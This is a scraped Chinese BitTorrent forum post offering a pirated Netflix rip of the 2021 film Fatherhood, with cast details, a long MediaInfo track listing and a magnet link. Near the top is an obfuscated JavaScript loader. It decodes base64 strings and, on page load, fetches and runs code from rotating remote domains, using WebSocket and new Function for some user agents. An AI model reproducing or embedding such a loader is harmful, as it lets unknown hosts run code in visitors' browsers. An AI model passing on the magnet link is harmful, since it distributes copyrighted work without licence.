父亲的身份[中文字幕].Fatherhood.2021.1080p.NF.迅雷下载 9.99GB

版主小s 1月前 341

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

父亲的身份[中文字幕].Fatherhood.2021.1080p.NF.迅雷下载 9.99GB

◎译 名 父亲的身份 / 爸爸进行式(港) / 为父进行式(台) / 爸爸进行时 / 给麦迪的两个吻 / 为父进行时 / Two Kisses for Maddy

◎片 名 Fatherhood

◎年 代 2021

◎产 地 美国

◎类 别 剧情

◎语 言 英语

◎上映日期 2021-06-18(美国网络)

◎IMDb链接 https://www.imdb.com/title/tt4733624/

◎豆瓣链接 https://movie.douban.com/subject/26414810/

◎片 长 109分钟

◎导 演 保罗·韦兹 Paul Weitz (id:1300655)

◎编 剧 达娜·史蒂文斯 Dana Stevens (id:1328358)

保罗·韦兹 Paul Weitz (id:1300655)

◎演 员 凯文·哈特 Kevin Hart (id:1286162)

朱利安·凯西 Julian Casey (id:1337404)

霍莉·G·弗兰克尔 Holly G. Frankel (id:1080627)

亚瑟·霍尔顿 Arthur Holden (id:1374236)

阿德里安·M·蒙波因特 Adrian M. Mompoint (id:1413072)

路易斯·奥利瓦 Luis Oliva (id:1128172)

保罗·雷瑟 Paul Reiser (id:1000222)

德汪达·怀斯 DeWanda Wise (id:1418807)

阿尔法·伍达德 Alfre Woodard (id:1041159)

里尔·莱尔·哈瓦瑞 Lil Rel Howery (id:1369571)

艾伦·大卫 Ellen David (id:1280977)

黛博拉·艾里德 Deborah Ayorinde (id:1369399)

安东尼·卡里根 Anthony Carrigan (id:1352164)

斯蒂芬妮·科斯塔 Stephanie Costa (id:1397487)

玛丽莲·迪恩-罗比齐 Mylène Dinh-Robic (id:1188884)

查宁·塔图姆 Channing Tatum (id:1031224)

贝莉·塞恩 Bailey Thain (id:1446877)

伊内斯·费格霍利·波松 Ines Feghouli Bozon (id:1446879)

◎标 签 美国 / 剧情 / 美国电影 / Netflix / 2021 / 温情 / 喜剧 / Channing·Tatum

◎简 介

这部暖心、有趣又感人的影片根据真人真事改编,凯文·哈特在剧中饰演的鳏夫在痛失爱妻后承担起一项艰巨任务:当个父亲。

General

Unique ID : 23959464504827999005734667099496860417 (0x12066CCDB9EA25EB1935C98988014B01)

Complete name : [email protected]

Format : Matroska

Format version : Version 4

File size : 9.99 GiB

Duration : 1 h 50 min

Overall bit rate mode : Variable

Overall bit rate : 12.9 Mb/s

Encoded date : UTC 2021-06-24 03:49:33

Writing application : mkvmerge v44.0.0 ('Domino') 64-bit

Writing library : libebml v1.3.10 + libmatroska v1.5.2

Video

ID : 1

Format : AVC

Format/Info : Advanced Video Codec

Format profile : [email protected]

Format settings : CABAC / 3 Ref Frames

Format settings, CABAC : Yes

Format settings, Reference frames : 3 frames

Codec ID : V_MPEG4/ISO/AVC

Duration : 1 h 50 min

Bit rate mode : Variable

Bit rate : 3 059 kb/s

Nominal bit rate : 2 075 kb/s

Maximum bit rate : 6 030 kb/s

Width : 1 920 pixels

Height : 1 080 pixels

Display aspect ratio : 16:9

Frame rate mode : Constant

Frame rate : 23.976 (24000/1001/53354) FPS

Color space : YUV

Chroma subsampling : 4:2:0

Bit depth : 8 bits

Scan type : Progressive

Bits/(Pixel*Frame) : 0.062

Stream size : 2.36 GiB (24%)

Writing library : x264 core 148 r2722 1b0121b

Encoding settings : cabac=1 / ref=3 / deblock=1:0:0 / analyse=0x1:0x111 / me=umh / subme=10 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=24 / chroma_me=1 / trellis=2 / 8x8dct=0 / cqm=0 / deadzone=21,11 / fast_pskip=1 / chroma_qp_offset=-2 / threads=8 / lookahead_threads=1 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / stitchable=1 / constrained_intra=0 / bframes=2 / b_pyramid=0 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=250 / keyint_min=23 / scenecut=0 / intra_refresh=0 / rc_lookahead=48 / rc=2pass / mbtree=1 / bitrate=2075 / ratetol=1.0 / qcomp=0.50 / qpmin=6 / qpmax=51 / qpstep=4 / cplxblur=20.0 / qblur=0.5 / vbv_maxrate=6030 / vbv_bufsize=8040 / nal_hrd=vbr / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / aq=1:1.00

Default : Yes

Forced : No

Audio #1

ID : 2

Format : E-AC-3 JOC

Format/Info : Enhanced AC-3 with Joint Object Coding

Commercial name : Dolby Digital Plus with Dolby Atmos

Codec ID : A_EAC3

Duration : 1 h 50 min

Bit rate mode : Constant

Bit rate : 768 kb/s

Channel(s) : 6 channels

Channel layout : L R C LFE Ls Rs

Sampling rate : 48.0 kHz

Frame rate : 31.250 FPS (1536 SPF)

Compression mode : Lossy

Stream size : 608 MiB (6%)

Title : English

Language : English

Service kind : Complete Main

Default : Yes

Forced : No

Complexity index : 16

Number of dynamic objects : 15

Bed channel count : 1 channel

Bed channel configuration : LFE

Audio #2

ID : 3

Format : E-AC-3

Format/Info : Enhanced AC-3

Commercial name : Dolby Digital Plus

Codec ID : A_EAC3

Duration : 1 h 50 min

Bit rate mode : Constant

Bit rate : 640 kb/s

Channel(s) : 6 channels

Channel layout : L R C LFE Ls Rs

Sampling rate : 48.0 kHz

Frame rate : 31.250 FPS (1536 SPF)

Compression mode : Lossy

Stream size : 506 MiB (5%)

Title : Czech

Language : Czech

Service kind : Complete Main

Default : No

Forced : No

Audio #3

ID : 4

Format : E-AC-3

Format/Info : Enhanced AC-3

Commercial name : Dolby Digital Plus

Codec ID : A_EAC3

Duration : 1 h 50 min

Bit rate mode : Constant

Bit rate : 640 kb/s

Channel(s) : 6 channels

Channel layout : L R C LFE Ls Rs

Sampling rate : 48.0 kHz

Frame rate : 31.250 FPS (1536 SPF)

Compression mode : Lossy

Stream size : 506 MiB (5%)

Title : French

Language : French

Service kind : Complete Main

Default : No

Forced : No

Audio #4

ID : 5

Format : E-AC-3

Format/Info : Enhanced AC-3

Commercial name : Dolby Digital Plus

Codec ID : A_EAC3

Duration : 1 h 50 min

Bit rate mode : Constant

Bit rate : 640 kb/s

Channel(s) : 6 channels

Channel layout : L R C LFE Ls Rs

Sampling rate : 48.0 kHz

Frame rate : 31.250 FPS (1536 SPF)

Compression mode : Lossy

Stream size : 506 MiB (5%)

Title : German

Language : German

Service kind : Complete Main

Default : No

Forced : No

Audio #5

ID : 6

Format : E-AC-3

Format/Info : Enhanced AC-3

Commercial name : Dolby Digital Plus

Codec ID : A_EAC3

Duration : 1 h 50 min

Bit rate mode : Constant

Bit rate : 640 kb/s

Channel(s) : 6 channels

Channel layout : L R C LFE Ls Rs

Sampling rate : 48.0 kHz

Frame rate : 31.250 FPS (1536 SPF)

Compression mode : Lossy

Stream size : 506 MiB (5%)

Title : Hindi

Language : Hindi

Service kind : Complete Main

Default : No

Forced : No

Audio #6

ID : 7

Format : E-AC-3

Format/Info : Enhanced AC-3

Commercial name : Dolby Digital Plus

Codec ID : A_EAC3

Duration : 1 h 50 min

Bit rate mode : Constant

Bit rate : 640 kb/s

Channel(s) : 6 channels

Channel layout : L R C LFE Ls Rs

Sampling rate : 48.0 kHz

Frame rate : 31.250 FPS (1536 SPF)

Compression mode : Lossy

Stream size : 506 MiB (5%)

Title : Hungarian

Language : Hungarian

Service kind : Complete Main

Default : No

Forced : No

Audio #7

ID : 8

Format : E-AC-3

Format/Info : Enhanced AC-3

Commercial name : Dolby Digital Plus

Codec ID : A_EAC3

Duration : 1 h 50 min

Bit rate mode : Constant

Bit rate : 640 kb/s

Channel(s) : 6 channels

Channel layout : L R C LFE Ls Rs

Sampling rate : 48.0 kHz

Frame rate : 31.250 FPS (1536 SPF)

Compression mode : Lossy

Stream size : 506 MiB (5%)

Title : Italian

Language : Italian

Service kind : Complete Main

Default : No

Forced : No

Audio #8

ID : 9

Format : E-AC-3 JOC

Format/Info : Enhanced AC-3 with Joint Object Coding

Commercial name : Dolby Digital Plus with Dolby Atmos

Codec ID : A_EAC3

Duration : 1 h 50 min

Bit rate mode : Constant

Bit rate : 768 kb/s

Channel(s) : 6 channels

Channel layout : L R C LFE Ls Rs

Sampling rate : 48.0 kHz

Frame rate : 31.250 FPS (1536 SPF)

Compression mode : Lossy

Stream size : 608 MiB (6%)

Title : Japanese

Language : Japanese

Service kind : Complete Main

Default : No

Forced : No

Complexity index : 16

Number of dynamic objects : 15

Bed channel count : 1 channel

Bed channel configuration : LFE

Audio #9

ID : 10

Format : E-AC-3

Format/Info : Enhanced AC-3

Commercial name : Dolby Digital Plus

Codec ID : A_EAC3

Duration : 1 h 50 min

Bit rate mode : Constant

Bit rate : 640 kb/s

Channel(s) : 6 channels

Channel layout : L R C LFE Ls Rs

Sampling rate : 48.0 kHz

Frame rate : 31.250 FPS (1536 SPF)

Compression mode : Lossy

Stream size : 506 MiB (5%)

Title : Polish

Language : Polish

Service kind : Complete Main

Default : No

Forced : No

Audio #10

ID : 11

Format : E-AC-3

Format/Info : Enhanced AC-3

Commercial name : Dolby Digital Plus

Codec ID : A_EAC3

Duration : 1 h 50 min

Bit rate mode : Constant

Bit rate : 640 kb/s

Channel(s) : 6 channels

Channel layout : L R C LFE Ls Rs

Sampling rate : 48.0 kHz

Frame rate : 31.250 FPS (1536 SPF)

Compression mode : Lossy

Stream size : 506 MiB (5%)

Title : Brazilian Portuguese

Language : Portuguese

Service kind : Complete Main

Default : No

Forced : No

Audio #11

ID : 12

Format : E-AC-3

Format/Info : Enhanced AC-3

Commercial name : Dolby Digital Plus

Codec ID : A_EAC3

Duration : 1 h 50 min

Bit rate mode : Constant

Bit rate : 640 kb/s

Channel(s) : 6 channels

Channel layout : L R C LFE Ls Rs

Sampling rate : 48.0 kHz

Frame rate : 31.250 FPS (1536 SPF)

Compression mode : Lossy

Stream size : 506 MiB (5%)

Title : Russian

Language : Russian

Service kind : Complete Main

Default : No

Forced : No

Audio #12

ID : 13

Format : E-AC-3

Format/Info : Enhanced AC-3

Commercial name : Dolby Digital Plus

Codec ID : A_EAC3

Duration : 1 h 50 min

Bit rate mode : Constant

Bit rate : 640 kb/s

Channel(s) : 6 channels

Channel layout : L R C LFE Ls Rs

Sampling rate : 48.0 kHz

Frame rate : 31.250 FPS (1536 SPF)

Compression mode : Lossy

Stream size : 506 MiB (5%)

Title : Spanish

Language : Spanish

Service kind : Complete Main

Default : No

Forced : No

Audio #13

ID : 14

Format : E-AC-3

Format/Info : Enhanced AC-3

Commercial name : Dolby Digital Plus

Codec ID : A_EAC3

Duration : 1 h 50 min

Bit rate mode : Constant

Bit rate : 640 kb/s

Channel(s) : 6 channels

Channel layout : L R C LFE Ls Rs

Sampling rate : 48.0 kHz

Frame rate : 31.250 FPS (1536 SPF)

Compression mode : Lossy

Stream size : 506 MiB (5%)

Title : European Spanish

Language : Spanish

Service kind : Complete Main

Default : No

Forced : No

Audio #14

ID : 15

Format : E-AC-3

Format/Info : Enhanced AC-3

Commercial name : Dolby Digital Plus

Codec ID : A_EAC3

Duration : 1 h 50 min

Bit rate mode : Constant

Bit rate : 640 kb/s

Channel(s) : 6 channels

Channel layout : L R C LFE Ls Rs

Sampling rate : 48.0 kHz

Frame rate : 31.250 FPS (1536 SPF)

Compression mode : Lossy

Stream size : 506 MiB (5%)

Title : Thai

Language : Thai

Service kind : Complete Main

Default : No

Forced : No

Audio #15

ID : 16

Format : E-AC-3

Format/Info : Enhanced AC-3

Commercial name : Dolby Digital Plus

Codec ID : A_EAC3

Duration : 1 h 50 min

Bit rate mode : Constant

Bit rate : 640 kb/s

Channel(s) : 6 channels

Channel layout : L R C LFE Ls Rs

Sampling rate : 48.0 kHz

Frame rate : 31.250 FPS (1536 SPF)

Compression mode : Lossy

Stream size : 506 MiB (5%)

Title : Turkish

Language : Turkish

Service kind : Complete Main

Default : No

Forced : No

Text #1

ID : 17

Format : UTF-8

Codec ID : S_TEXT/UTF8

Codec ID/Info : UTF-8 Plain Text

Duration : 1 h 43 min

Bit rate : 123 b/s

Count of elements : 2036

Stream size : 93.0 KiB (0%)

Title : English

Language : English

Default : Yes

Forced : No

Text #2

ID : 18

Format : UTF-8

Codec ID : S_TEXT/UTF8

Codec ID/Info : UTF-8 Plain Text

Duration : 1 h 46 min

Bit rate : 126 b/s

Count of elements : 1799

Stream size : 98.7 KiB (0%)

Title : Arabic

Language : Arabic

Default : No

Forced : No

Text #3

ID : 19

Format : UTF-8

Codec ID : S_TEXT/UTF8

Codec ID/Info : UTF-8 Plain Text

Duration : 1 h 46 min

Bit rate : 77 b/s

Count of elements : 1902

Stream size : 60.7 KiB (0%)

Title : Chinese Simplified

Language : Chinese

Default : No

Forced : No

Text #4

ID : 20

Format : UTF-8

Codec ID : S_TEXT/UTF8

Codec ID/Info : UTF-8 Plain Text

Duration : 1 h 48 min

Bit rate : 73 b/s

Count of elements : 1819

Stream size : 58.5 KiB (0%)

Title : Chinese Traditional

Language : Chinese

Default : No

Forced : No

Text #5

ID : 21

Format : UTF-8

Codec ID : S_TEXT/UTF8

Codec ID/Info : UTF-8 Plain Text

Duration : 1 h 46 min

Bit rate : 57 b/s

Count of elements : 1734

Stream size : 45.1 KiB (0%)

Title : Croatian

Language : Croatian

Default : No

Forced : No

Text #6

ID : 22

Format : UTF-8

Codec ID : S_TEXT/UTF8

Codec ID/Info : UTF-8 Plain Text

Duration : 1 h 47 min

Bit rate : 65 b/s

Count of elements : 1762

Stream size : 51.5 KiB (0%)

Title : Czech

Language : Czech

Default : No

Forced : No

Text #7

ID : 23

Format : UTF-8

Codec ID : S_TEXT/UTF8

Codec ID/Info : UTF-8 Plain Text

Duration : 1 h 46 min

Bit rate : 66 b/s

Count of elements : 1661

Stream size : 52.2 KiB (0%)

Title : Danish

Language : Danish

Default : No

Forced : No

Text #8

ID : 24

Format : UTF-8

Codec ID : S_TEXT/UTF8

Codec ID/Info : UTF-8 Plain Text

Duration : 1 h 46 min

Bit rate : 57 b/s

Count of elements : 1466

Stream size : 44.9 KiB (0%)

Title : Dutch

Language : Dutch

Default : No

Forced : No

Text #9

ID : 25

Format : UTF-8

Codec ID : S_TEXT/UTF8

Codec ID/Info : UTF-8 Plain Text

Duration : 1 h 46 min

Bit rate : 66 b/s

Count of elements : 1340

Stream size : 52.0 KiB (0%)

Title : Finnish

Language : Finnish

Default : No

Forced : No

Text #10

ID : 26

Format : UTF-8

Codec ID : S_TEXT/UTF8

Codec ID/Info : UTF-8 Plain Text

Duration : 1 h 46 min

Bit rate : 63 b/s

Count of elements : 1575

Stream size : 49.8 KiB (0%)

Title : French

Language : French

Default : No

Forced : No

Text #11

ID : 27

Format : UTF-8

Codec ID : S_TEXT/UTF8

Codec ID/Info : UTF-8 Plain Text

Duration : 1 h 46 min

Bit rate : 68 b/s

Count of elements : 1708

Stream size : 53.9 KiB (0%)

Title : German

Language : German

Default : No

Forced : No

Text #12

ID : 28

Format : UTF-8

Codec ID : S_TEXT/UTF8

Codec ID/Info : UTF-8 Plain Text

Duration : 1 h 46 min

Bit rate : 113 b/s

Count of elements : 1746

Stream size : 88.6 KiB (0%)

Title : Greek

Language : Greek

Default : No

Forced : No

Text #13

ID : 29

Format : UTF-8

Codec ID : S_TEXT/UTF8

Codec ID/Info : UTF-8 Plain Text

Duration : 1 h 47 min

Bit rate : 111 b/s

Count of elements : 1853

Stream size : 87.5 KiB (0%)

Title : Hebrew

Language : Hebrew

Default : No

Forced : No

Text #14

ID : 30

Format : UTF-8

Codec ID : S_TEXT/UTF8

Codec ID/Info : UTF-8 Plain Text

Duration : 1 h 46 min

Bit rate : 68 b/s

Count of elements : 1761

Stream size : 53.9 KiB (0%)

Title : Hungarian

Language : Hungarian

Default : No

Forced : No

Text #15

ID : 31

Format : UTF-8

Codec ID : S_TEXT/UTF8

Codec ID/Info : UTF-8 Plain Text

Duration : 1 h 47 min

Bit rate : 66 b/s

Count of elements : 1804

Stream size : 52.6 KiB (0%)

Title : Indonesian

Language : Indonesian

Default : No

Forced : No

Text #16

ID : 32

Format : UTF-8

Codec ID : S_TEXT/UTF8

Codec ID/Info : UTF-8 Plain Text

Duration : 1 h 47 min

Bit rate : 61 b/s

Count of elements : 1707

Stream size : 48.6 KiB (0%)

Title : Italian

Language : Italian

Default : No

Forced : No

Text #17

ID : 33

Format : UTF-8

Codec ID : S_TEXT/UTF8

Codec ID/Info : UTF-8 Plain Text

Duration : 1 h 47 min

Bit rate : 70 b/s

Count of elements : 1987

Stream size : 55.5 KiB (0%)

Title : Japanese

Language : Japanese

Default : No

Forced : No

Text #18

ID : 34

Format : UTF-8

Codec ID : S_TEXT/UTF8

Codec ID/Info : UTF-8 Plain Text

Duration : 1 h 46 min

Bit rate : 85 b/s

Count of elements : 1891

Stream size : 66.7 KiB (0%)

Title : Korean

Language : Korean

Default : No

Forced : No

Text #19

ID : 35

Format : UTF-8

Codec ID : S_TEXT/UTF8

Codec ID/Info : UTF-8 Plain Text

Duration : 1 h 46 min

Bit rate : 68 b/s

Count of elements : 1780

Stream size : 53.2 KiB (0%)

Title : Malay

Language : Malay

Default : No

Forced : No

Text #20

ID : 36

Format : UTF-8

Codec ID : S_TEXT/UTF8

Codec ID/Info : UTF-8 Plain Text

Duration : 1 h 46 min

Bit rate : 64 b/s

Count of elements : 1507

Stream size : 50.3 KiB (0%)

Title : Norwegian Bokmal

Language : Norwegian Bokmal

Default : No

Forced : No

Text #21

ID : 37

Format : UTF-8

Codec ID : S_TEXT/UTF8

Codec ID/Info : UTF-8 Plain Text

Duration : 1 h 46 min

Bit rate : 62 b/s

Count of elements : 1759

Stream size : 49.0 KiB (0%)

Title : Polish

Language : Polish

Default : No

Forced : No

Text #22

ID : 38

Format : UTF-8

Codec ID : S_TEXT/UTF8

Codec ID/Info : UTF-8 Plain Text

Duration : 1 h 46 min

Bit rate : 70 b/s

Count of elements : 1759

Stream size : 55.4 KiB (0%)

Title : Portuguese

Language : Portuguese

Default : No

Forced : No

Text #23

ID : 39

Format : UTF-8

Codec ID : S_TEXT/UTF8

Codec ID/Info : UTF-8 Plain Text

Duration : 1 h 43 min

Bit rate : 65 b/s

Count of elements : 1704

Stream size : 49.4 KiB (0%)

Title : Brazilian Portuguese

Language : Portuguese

Default : No

Forced : No

Text #24

ID : 40

Format : UTF-8

Codec ID : S_TEXT/UTF8

Codec ID/Info : UTF-8 Plain Text

Duration : 1 h 46 min

Bit rate : 71 b/s

Count of elements : 1502

Stream size : 55.6 KiB (0%)

Title : Romanian

Language : Romanian

Default : No

Forced : No

Text #25

ID : 41

Format : UTF-8

Codec ID : S_TEXT/UTF8

Codec ID/Info : UTF-8 Plain Text

Duration : 1 h 46 min

Bit rate : 105 b/s

Count of elements : 1782

Stream size : 82.8 KiB (0%)

Title : Russian

Language : Russian

Default : No

Forced : No

Text #26

ID : 42

Format : UTF-8

Codec ID : S_TEXT/UTF8

Codec ID/Info : UTF-8 Plain Text

Duration : 1 h 46 min

Bit rate : 64 b/s

Count of elements : 1723

Stream size : 50.5 KiB (0%)

Title : Spanish

Language : Spanish

Default : No

Forced : No

Text #27

ID : 43

Format : UTF-8

Codec ID : S_TEXT/UTF8

Codec ID/Info : UTF-8 Plain Text

Duration : 1 h 46 min

Bit rate : 65 b/s

Count of elements : 1823

Stream size : 51.3 KiB (0%)

Title : European Spanish

Language : Spanish

Default : No

Forced : No

Text #28

ID : 44

Format : UTF-8

Codec ID : S_TEXT/UTF8

Codec ID/Info : UTF-8 Plain Text

Duration : 1 h 46 min

Bit rate : 64 b/s

Count of elements : 1426

Stream size : 50.6 KiB (0%)

Title : Swedish

Language : Swedish

Default : No

Forced : No

Text #29

ID : 45

Format : UTF-8

Codec ID : S_TEXT/UTF8

Codec ID/Info : UTF-8 Plain Text

Duration : 1 h 46 min

Bit rate : 178 b/s

Count of elements : 1817

Stream size : 140 KiB (0%)

Title : Thai

Language : Thai

Default : No

Forced : No

Text #30

ID : 46

Format : UTF-8

Codec ID : S_TEXT/UTF8

Codec ID/Info : UTF-8 Plain Text

Duration : 1 h 46 min

Bit rate : 68 b/s

Count of elements : 1522

Stream size : 53.9 KiB (0%)

Title : Turkish

Language : Turkish

Default : No

Forced : No

Text #31

ID : 47

Format : UTF-8

Codec ID : S_TEXT/UTF8

Codec ID/Info : UTF-8 Plain Text

Duration : 1 h 46 min

Bit rate : 109 b/s

Count of elements : 1815

Stream size : 86.0 KiB (0%)

Title : Ukrainian

Language : Ukrainian

Default : No

Forced : No

Text #32

ID : 48

Format : UTF-8

Codec ID : S_TEXT/UTF8

Codec ID/Info : UTF-8 Plain Text

Duration : 1 h 46 min

Bit rate : 92 b/s

Count of elements : 1741

Stream size : 72.5 KiB (0%)

Title : Vietnamese

Language : Vietnamese

Default : No

Forced : No


TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:3E36389A40A22943E61C6DF4CB5F650677E0A2B8
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖